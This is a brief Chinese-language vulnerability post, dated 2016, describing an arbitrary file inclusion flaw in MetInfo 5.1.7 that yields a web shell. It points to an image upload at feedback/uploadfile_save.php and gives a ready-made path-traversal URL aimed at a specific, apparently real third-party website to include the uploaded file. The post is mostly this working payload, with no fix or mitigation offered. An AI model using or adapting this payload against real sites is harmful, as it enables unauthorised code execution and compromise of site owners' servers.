MetInfo 5.1.7任意文件包含漏洞可getshell
没穿底裤发表于 2016-02-16 16:17:29
漏洞作者: 路人甲
getshell可以参考前人的feedback/uploadfile_save.php可以上传图片文件。
http://www.0891display.cn//index.php?index=a&skin=default/../&dataoptimize_html=/../../upload/file/1449564120.jpg
![08163019595845876bd69b1cd7366c8c341f8618[1]](http://7u2hr4.com1.z0.glb.clouddn.com/wp-content/uploads/2016/02/08163019595845876bd69b1cd7366c8c341f86181.jpg)